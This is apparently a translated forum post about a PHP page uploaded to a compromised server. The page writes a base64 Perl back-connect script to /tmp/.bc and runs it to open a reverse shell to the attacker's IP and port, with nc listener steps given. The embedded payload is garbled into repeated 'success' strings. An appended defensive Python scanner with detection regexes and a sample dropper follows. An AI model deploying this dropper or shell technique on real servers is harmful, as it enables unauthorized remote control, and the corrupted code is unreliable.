I was at a loss and could not think of a good solution, so I came up with a trick: drop a PHP page on the server and have it bounce a shell straight back. Working in a real console is also far more convenient than a webshell, and there are no timeouts or similar problems.
Because I don't know much about PHP, I looked up the wretched Nono and light rain and modified the code. The back-connect code was taken from phpspy2008, but it cannot be used as-is; you need to split it out into a separate PHP file. After uploading it, listen on a local port, set the callback IP address and port in the code, then simply request the page and a shell comes back.
To be clear, there is no technical content here; it is purely for convenience. This way you just request the PHP page and the shell bounces back directly, with no further tedious steps. The modified code is shown below.
The code is as follows:
```php
<?php
// Resolve a program name to its full path with `which`, falling back to the bare name.
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}

// Run a command with whichever execution function the host has left enabled,
// trying exec, shell_exec, system, passthru and finally popen.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}

// Decode a base64 blob and write it to a file.
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}

$yourip   = "your IP";
$yourport = 'your port';
$usedb = array('perl' => 'perl', 'c' => 'c');
// Base64-encoded Perl back-connect script taken from phpspy2008.
$back_connect = "success".
"success".
"success".
"success".
"success".
"success".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=";
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . "/tmp/.bc $yourip $yourport &");
?>
```
First run nc -l -vv -p port locally, then request the PHP page (http://www.site.com/fuck.php); the local listener will receive the bounced shell.
This method only applies to the zombie-host style of work. If you have a better method, please don't hesitate to share it with me.
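As an added defender-side example (not code from the original post), the Python scanner below flags PHP files that show the traits of the dropper above: the exec/shell_exec/system/passthru/popen fallback chain, a base64 stage written to a hidden file under /tmp, hard-coded callback IP and port variables, and a backgrounded interpreter launched via which(). The trait names, regexes and both sample sources are my own constructions, and the scanner is a heuristic for triage, not a complete detector.

```python
# Added example, not from the original post: static triage of PHP files for the
# traits of the back-connect dropper shown above. Heuristic only; samples are constructed.
import re

# The fallback chain of command-execution functions the dropper walks through.
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")

def _exec_chain(src):
    # Three or more distinct exec functions in one file is a classic webshell trait.
    return sum(1 for f in EXEC_FUNCS if re.search(rf"\b{f}\s*\(", src)) >= 3

CHECKS = {
    "exec_fallback_chain": _exec_chain,
    # Embedded base64 stage decoded and written to disk.
    "base64_written_to_file": lambda s: bool(re.search(r"f(?:puts|write)\s*\([^;]*base64_decode", s)),
    # Hidden dotfile under /tmp, like /tmp/.bc in the post.
    "hidden_tmp_file": lambda s: bool(re.search(r"['\"]/tmp/\.\w+['\"]", s)),
    # Hard-coded callback IP and port variables.
    "callback_params": lambda s: bool(re.search(r"\$\w*(?:ip|port)\w*\s*=\s*['\"]", s, re.I)),
    # Interpreter located via which() run on the dropped file and backgrounded with &.
    "background_interpreter": lambda s: bool(re.search(r"which\s*\(.*?\)\s*\.\s*['\"]/tmp/.*&", s)),
    # Blanket @ error suppression on many calls.
    "error_suppression": lambda s: len(re.findall(r"@\s*\w+\s*\(", s)) >= 5,
}

def scan_php_source(src):
    """Return the matched trait names and a verdict for one PHP source string."""
    hits = [name for name, check in CHECKS.items() if check(src)]
    return {"hits": hits, "verdict": "suspicious" if len(hits) >= 3 else "clean"}

# Constructed sample: the shape of the post's dropper, payload omitted.
SUSPICIOUS_PHP = r'''<?php
function execute($cfe){ $res='';
 if(function_exists('exec')){ @exec($cfe,$res); $res=join("\n",$res); }
 elseif(function_exists('shell_exec')){ $res=@shell_exec($cfe); }
 elseif(function_exists('system')){ @ob_start(); @system($cfe); $res=@ob_get_contents(); }
 elseif(@is_resource($f=@popen($cfe,"r"))){ $res=@fread($f,1024); @pclose($f); }
 return $res; }
function cf($fname,$text){ if($fp=@fopen($fname,'w')){ @fputs($fp,@base64_decode($text)); } }
$yourip="192.0.2.10"; $yourport='4444'; $back_connect="<payload omitted>";
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . "/tmp/.bc $yourip $yourport &");
?>'''
# Constructed benign admin page: a single exec call and none of the other traits.
BENIGN_PHP = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
echo htmlspecialchars(shell_exec('uptime'));
?>'''
```

Run scan_php_source() over each uploaded .php file or over the web root on a schedule and review anything that returns "suspicious"; pair it with upload logs and egress monitoring for the callback connection itself.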